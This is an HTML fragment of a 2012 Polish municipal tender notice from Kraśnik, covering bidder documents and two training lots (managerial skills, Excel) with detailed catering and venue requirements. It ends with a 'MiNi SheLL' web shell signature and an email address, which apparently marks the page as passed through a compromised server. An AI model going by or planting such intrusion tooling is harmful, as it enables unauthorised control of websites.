<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany stawki podatku VAT zmianie ulega kwota wynagrodzenia netto, bez zmiany kwot brutto</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.krasnik.eu/index.php?id=39<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kraśnik
ul. Lubelska 84
23-200  Kraśnik
pok. 321.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2012 godzina 13:00, miejsce: Urząd Miasta Kraśnik
ul. Lubelska 84
23-200  Kraśnik.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 25.02.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkolenia Trening umiejętności kierowniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.	Zadanie nr 1 (zorganizowanie i przeprowadzenie szkolenia Trening umiejętności kierowniczych):
a)	szkolenie realizowane będzie w dwóch etapach (2 etapy po 2 dni, łącznie 4 dni szkoleniowe dla 2 grup) i obejmować będzie 16 uczestników (pracownicy Urzędu Miasta Kraśnik) - 2 grupy x 8 osób, przy czym Zamawiający zastrzega sobie prawo do zmniejszenia liczby uczestników planowanych do objęcia szkoleniem o nie więcej niż 2 osoby w wyniku nieprzewidzianych zdarzeń losowych (np. choroba uczestnika szkolenia, sprawowanie opieki nad chorym członkiem rodziny, rozwiązanie stosunku pracy, itp.),
b)	szkolenie obejmować będzie łącznie 64 godzin lekcyjnych - 2 grupy x 32 h (godzina lekcyjna zajęć liczy 45 minut i 15 minut przerwy, przy czym długość przerw może być ustalana elastycznie), 
c)	zajęcia przeprowadzone będą w dni robocze (od poniedziałku do piątku) w przedziale czasowym od 9:00 do 17:00, z zastrzeżeniem, że liczba godzin zajęć szkoleniowych 
w ciągu jednego dnia nie przekroczy 8 godzin zegarowych,
d)	Wykonawca zapewni do prowadzenia zajęć osobę/osoby posiadające odpowiednią wiedzę i doświadczenie w realizacji szkoleń z zakresu treningu umiejętności kierowniczych,
e)	Zakres szkolenia obejmuje co najmniej:
	interesy i stanowiska w relacji szef - pracownik,
	sposoby uzasadniania interwencji szefowskich,
	język szefa wzmacniający jego autorytet,
	komunikowanie pracownikom trudnych decyzji, bronienie własnych postanowień,
	delegowanie zadań,
	motywowanie pracowników z mocy szefowskiej,
	zasady karania i nagradzania pracowników wzmacniające ich odpowiedzialność 
i zaangażowanie,
	 repertuar kar i nagród.
f)	Cele szkolenia to przede wszystkim:
	wzmocnienie szczebla kierowniczego w Urzędzie,
	podniesienie poziomu realizowanych działań (zgodnie z II Filarem Dobrego Rządzenia),
	zwiększenie efektywności pracy kierowników oraz podległych im zespołów,
	podniesienie poziomu umiejętności radzenia sobie w trudnych sytuacjach  kierownik - pracownik.
g)	Szkolenie będzie prowadzone głównie metodą warsztatową (ćwiczenia, symulacje, scenki) i będzie opierało się na realnych sytuacjach urzędników i ich problemach. 
h)	Wykonawca zobowiązany jest do zorganizowania 2 odrębnych szkoleń wyjazdowych. Zamawiający nie zezwala na łączenie grup wyjazdowych (tj. organizowanie szkoleń 
w tym samym ośrodku i tym samym terminie dla obu grup). Wykonawca może zorganizować oba szkolenia w jednym ośrodku lub w różnych ośrodkach dla każdej grupy.
i)	Wykonawca zapewnia uczestnikom szkolenia zakwaterowanie wraz z noclegiem 
w hotelu o standardzie co najmniej dwugwiazdkowym  lub obiekcie hotelarskim spełniającym wymagania dla hotelu o standardzie co najmniej dwugwiazdkowym, znajdującym się poza granicami miasta Kraśnik, jednak w odległości nie większej niż 250 km, w miejscowości wypoczynkowej lub atrakcyjnej turystycznie. Wykonawca zapewni zakwaterowania uczestnikom warsztatów w pokojach 1-2 osobowych (co najmniej 2 pokoje 1-osobowe) z  pełnym węzłem sanitarnym tj. umywalka, wc, natrysk lub wanna. Zamawiający nie dopuszcza zakwaterowania w domkach letniskowych. Uczestnicy zakwaterowani powinni być w jednym budynku albo ośrodku Zajęcia szkoleniowe odbywać się będą w tym samym budynku, w którym zakwaterowani będą uczestnicy szkolenia, Zajęcia szkoleniowe zostaną przeprowadzone w pomieszczeniu z odpowiednim oświetleniem oraz dostępem do światła dziennego (z możliwością zaciemnienia okien), ogrzewaniem i klimatyzacją, dostosowanym do prowadzenia zajęć szkoleniowych, zapewnionym zapleczem, posiadającym odpowiednie warunki sanitarne, bezpieczeństwa i higieny pracy, akustyczne i jakościowe, którego powierzchnia, ilość stanowisk oraz wyposażenie 
w sprzęt i pomoce dydaktyczne dostosowana jest do zakresu szkolenia oraz liczby uczestników szkolenia.
j)	Wykonawca zapewnia uczestnikom szkolenia wyżywienie obejmujące obiad i 2 przerwy kawowe (w każdym z dni szkoleniowych). Posiłki będą podawane w innej sali niż sala wykładowa. Wykonawca zapewnia wydanie posiłku jednocześnie dla wszystkich uczestników danego szkolenia. Obiad składa się przynajmniej z:
	zupy (po min. 350 ml),
	dania głównego: ziemniaki zamiennie z ryżem (każde po min. 200g) + sztuka mięsa (min. 150 g - bez sosu, z sosem min. 170 g) lub kotlet schabowy (min. 150 g) lub drób (min. 150 g) lub ryba (min. 150 g) + warzywa gotowane lub zestaw surówek z warzyw (min. 200 g),
	deser (ciasto, i owoc),
	napoje. 
Podane gramatury dot. produktów po obróbce cieplnej. Wszystkie składniki obiadów podawanych w poszczególnych dniach szkolenia powinny być różne. Obiad dla każdego uczestnika powinien być podany na ciepło na zastawie ceramicznej 
z kompletem sztućców metalowych i serwetek. Obiad może być dostarczony jako wyporcjowany lub porcjowanie może odbywać się w chwili podawania obiadu. 
W trakcie przerw kawowych Wykonawca zapewnia serwis kawowy składający się przynajmniej z: świeżoparzonej, gorącej kawy, gorącej wody, herbaty w torebkach jednorazowych, różnorodnych soków, wody mineralnej gazowanej i niegazowanej, 3 rodzajów ciastek, owoców. 
Wykonawca zapewnia serwis gastronomiczny (zastawa, przygotowanie i sprzątanie) 
w każdym dniu szkolenia.
k)	Wykonawca zobowiązany jest zapewnić wszystkim uczestnikom szkolenia:
	materiały szkoleniowe w formie papierowej - zgodne z tematyką szkolenia, 
w skład których wchodzą w szczególności: skrypty lub inne niezbędne pomoce naukowe, akty prawne, wzory dokumentów i formularzy z zakresu objętego tematem szkolenia przekazywane każdemu uczestnikowi na własność. Materiały szkoleniowe mają być przekazane uczestnikom szkolenia w momencie  rozpoczęcia szkolenia, bądź na bieżąco zgodnie z realizowanym tematem zajęć. Materiały szkoleniowe, które uczestnik otrzyma na własność muszą być nowe, nieużywanie, adekwatne do treści szkolenia, z obowiązującym stanem prawnym oraz dobre jakościowo. Materiały szkoleniowe muszą spełniać Wytyczne Dotyczące Oznaczania Projektów w Ramach Programu Operacyjnego Kapitał Ludzki (Wytyczne zostały zamieszczone na stronie internetowej Zamawiającego http://bip.krasnik.eu/index.php?id=39 jako  załącznik do SIWZ),
	dostęp do pomieszczeń sanitarnych w budynku, w pobliżu pomieszczenia, 
w którym odbywać się będą zajęcia szkoleniowe (wc, umywalka z dostępem do ciepłej wody),
	ubezpieczenie od następstw nieszczęśliwych wypadków wszystkich uczestników szkolenia przez cały okres jego trwania,
	niezbędny sprzęt, maszyny, narzędzia i urządzenia na czas trwania szkolenia, 
w tym projektor multimedialny, ekran oraz tablicę demonstracyjną flipchart 
z zapasem kartek,
	dokładny rozkład zajęć odpowiadający harmonogramowi szkolenia z podanymi tematami wynikającymi z programu szkolenia, który będzie wydany każdemu uczestnikowi w dniu rozpoczęcia szkolenia,
l)	Wykonawca będzie prowadził dokumentację przebiegu szkolenia składającą się z: dziennika zajęć edukacyjnych zawierający listę obecności uwzględniającą podpisy uczestników szkolenia oraz wymiar godzin i tematy zajęć edukacyjnych, potwierdzenia wydania uczestnikom szkolenia materiałów dydaktycznych, posiłków, noclegów oraz ankiet wypełnionych przez uczestników szkolenia służących do jego oceny. Ankiety zostaną przygotowane przez Wykonawcę.
m)	Opracowanie i wydruk zaświadczeń potwierdzających udział w cyklu szkoleń w ilości odpowiadającej liczbie uczestników zapewnia Zamawiający. Wykonawca odpowiada za podpisanie przez osoby prowadzące zaświadczeń oraz za przekazanie ich za potwierdzeniem odbioru każdemu uczestnikowi po zakończeniu udziału w cyklu szkoleń.
n)	Wykonawca jest bezpośrednio odpowiedzialny za przygotowanie, przeprowadzenie 
i obsługę szkolenia.
o)	Wykonawca nie może pobierać żadnych opłat od uczestników szkolenia.
p)	Wykonawca zobowiązany jest do niezwłocznego dostarczenia Zamawiającemu po zakończeniu szkolenia dokumentacji obejmującej: oryginały list obecności wraz 
z podpisami uczestników szkolenia, potwierdzenie wydania uczestnikom szkolenia materiałów dydaktycznych, posiłków i noclegów oraz ankiety wypełnione przez uczestników szkolenia służące do jego oceny.
q)	Zamawiający zastrzega sobie prawo kontrolowania przebiegu, sposobu prowadzenia oraz efektywności szkolenia i frekwencji uczestników, wglądu do prowadzonej dokumentacji. 
r)	Termin wykonania zamówienia: do 31.03.2012 r., przy czym Zamawiający z co najmniej tygodniowym wyprzedzeniem przed planowanym terminem rozpoczęcia szkolenia poinformuje Wykonawcę o terminie jego rozpoczęcia i zakończenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4, 80.51.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkolenia Excel na potrzeby urzędu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Szkolenie jest szkoleniem stacjonarnym - w granicach administracyjnych miasta Kraśnik.
b)	Szkolenie obejmować będzie 30 uczestników (pracownicy Urzędu Miasta Kraśnik) -2 grupy x 15 osób, przy czym Zamawiający zastrzega sobie prawo do zmniejszenia liczby uczestników planowanych do objęcia szkoleniem o nie więcej niż 2 osoby 
w wyniku nieprzewidzianych zdarzeń losowych (np. choroba uczestnika szkolenia, sprawowanie opieki nad chorym członkiem rodziny, rozwiązanie stosunku pracy, itp.).
c)	Szkolenie obejmować będzie łącznie 32 godzin lekcyjnych - 2 grupy x 16 h (godzina lekcyjna zajęć liczy 45 minut i 15 minut przerwy, przy czym długość przerw może być ustalana elastycznie).
d)	Zajęcia przeprowadzone będą w dni robocze od poniedziałku do piątku w przedziale czasowym od 7.30 do 15.30, z zastrzeżeniem, że liczba godzin zajęć szkoleniowych 
w ciągu jednego dnia nie przekroczy 8 godzin zegarowych
e)	Wykonawca zapewni do prowadzenia zajęć osobę/osoby posiadające odpowiednią wiedzę i doświadczenie w realizacji szkoleń z zakresu obsługi programu Excel.
f)	Zakres szkolenia obejmuje co najmniej:
	budowanie i edycja arkusza,
	najczęstsze operacje w Excelu,
	listy płac,
	rozliczanie delegacji,
	obliczenia,
	budowanie tabel,
	formatowanie treści i tabel,
	graficzne prezentacje danych,
	elementy analizy danych.
g)	Cele szkolenia to przede wszystkim:
	podwyższenie umiejętności z zakresu korzystania z Excel,
	wzrost efektywności przygotowań raportów, zestawień w UMK.
h)	Wykonawca we własnym zakresie zorganizuje salę szkoleniową na terenie miasta Kraśnik. Zajęcia szkoleniowe mają być przeprowadzone w pomieszczeniu 
z odpowiednim oświetleniem oraz dostępem do światła dziennego (z możliwością zaciemnienia okien), ogrzewaniem i klimatyzacją, dostosowanym do prowadzenia zajęć szkoleniowych, zapewnionym zapleczem, posiadającym odpowiednie warunki sanitarne, bezpieczeństwa i higieny pracy, akustyczne i jakościowe, którego powierzchnia, ilość stanowisk oraz wyposażenie w sprzęt (komputer lub laptop 
z odpowiednim oprogramowaniem) i pomoce dydaktyczne dostosowana jest do zakresu szkolenia oraz liczby uczestników szkolenia.
i)	Wykonawca zapewnia uczestnikom szkolenia wyżywienie obejmujące obiad i 2 przerwy kawowe (w każdym z dni szkoleniowych). Posiłki będą podawane w innej sali niż sala wykładowa. Wykonawca zapewnia wydanie posiłku jednocześnie dla wszystkich uczestników danego szkolenia. Obiad składa się przynajmniej z:
	zupy (po min. 350 ml),
	dania głównego: ziemniaki zamiennie z ryżem (każde po min. 200g) + sztuka mięsa (min. 150 g - bez sosu, z sosem min. 170 g) lub kotlet schabowy (min. 150 g) lub drób (min. 150 g) lub ryba (min. 150 g) + warzywa gotowane lub zestaw surówek z warzyw (min. 200 g),
	deser (ciasto, i owoc),
	napoje. 
Podane gramatury dot. produktów po obróbce cieplnej. Wszystkie składniki obiadów podawanych w poszczególnych dniach szkolenia powinny być różne. Obiad dla każdego uczestnika powinien być podany na ciepło na zastawie ceramicznej 
z kompletem sztućców metalowych i serwetek. Obiad może być dostarczony jako wyporcjowany lub porcjowanie może odbywać się w chwili podawania obiadu. 
W trakcie przerw kawowych Wykonawca zapewnia serwis kawowy składający się przynajmniej z: świeżoparzonej, gorącej kawy, gorącej wody, herbaty w torebkach jednorazowych, różnorodnych soków, wody mineralnej gazowanej i niegazowanej, 3 rodzajów ciastek, owoców. 
Wykonawca zapewnia serwis gastronomiczny (zastawa, przygotowanie i sprzątanie) 
w każdym dniu szkolenia.
j)	Wykonawca zobowiązany jest zapewnić wszystkim uczestnikom szkolenia:
	materiały szkoleniowe w formie papierowej - zgodne z tematyką szkolenia, 
w skład których wchodzą w szczególności: skrypty lub inne niezbędne pomoce naukowe, akty prawne, wzory dokumentów i formularzy z zakresu objętego tematem szkolenia przekazywane każdemu uczestnikowi na własność. Materiały szkoleniowe mają być przekazane uczestnikom szkolenia w momencie  rozpoczęcia szkolenia, bądź na bieżąco zgodnie z realizowanym tematem zajęć. Materiały szkoleniowe, które uczestnik otrzyma na własność muszą być nowe, nieużywanie, adekwatne do treści szkolenia, z obowiązującym stanem prawnym oraz dobre jakościowo. Materiały szkoleniowe muszą spełniać Wytyczne Dotyczące Oznaczania Projektów w Ramach Programu Operacyjnego Kapitał Ludzki (Wytyczne zostały zamieszczone na stronie internetowej Zamawiającego http://bip.krasnik.eu/index.php?id=39 jako  załącznik do SIWZ),
	dostęp do pomieszczeń sanitarnych w budynku, w pobliżu pomieszczenia, 
w którym odbywać się będą zajęcia szkoleniowe (wc, umywalka z dostępem do ciepłej wody),
	niezbędny sprzęt, maszyny, narzędzia i urządzenia na czas trwania szkolenia, 
w tym projektor multimedialny, ekran oraz tablicę demonstracyjną flipchart 
z zapasem kartek,
	dokładny rozkład zajęć odpowiadający harmonogramowi szkolenia z podanymi tematami wynikającymi z programu szkolenia, który będzie wydany każdemu uczestnikowi w dniu rozpoczęcia szkolenia,
k)	Wykonawca będzie prowadził dokumentację przebiegu szkolenia składającą się z: dziennika zajęć edukacyjnych zawierający listę obecności uwzględniającą podpisy uczestników szkolenia oraz wymiar godzin i tematy zajęć edukacyjnych, potwierdzenia wydania uczestnikom szkolenia materiałów dydaktycznych i posiłków oraz ankiet wypełnionych przez uczestników szkolenia służących do jego oceny. Ankiety zostaną przygotowane przez Wykonawcę.
l)	Wykonawca jest bezpośrednio odpowiedzialny za przygotowanie, przeprowadzenie 
i obsługę szkolenia.
m)	Wykonawca nie może pobierać żadnych opłat od uczestników szkolenia.
n)	Wykonawca zobowiązany jest do niezwłocznego dostarczenia Zamawiającemu po zakończeniu szkolenia dokumentacji obejmującej: oryginały list obecności wraz 
z podpisami uczestników szkolenia, potwierdzenie wydania uczestnikom szkolenia materiałów dydaktycznych, posiłków oraz ankiety wypełnione przez uczestników szkolenia służące do jego oceny.
o)	Opracowanie i wydruk zaświadczeń potwierdzających udział w cyklu szkoleń w ilości odpowiadającej liczbie uczestników zapewnia Zamawiający. Wykonawca odpowiada za podpisanie przez osoby prowadzące zaświadczeń oraz za przekazanie ich u za potwierdzeniem odbioru każdemu uczestnikowi po zakończeniu udziału w cyklu szkoleń.
p)	Zamawiający zastrzega sobie prawo kontrolowania przebiegu, sposobu prowadzenia oraz efektywności szkolenia i frekwencji uczestników, wglądu do prowadzonej dokumentacji. 
q)	Termin wykonania zamówienia: do 31.03.2012 r., przy czym Zamawiający z co najmniej tygodniowym wyprzedzeniem przed planowanym terminem rozpoczęcia szkolenia poinformuje Wykonawcę o terminie jego rozpoczęcia i zakończenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4, 80.51.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com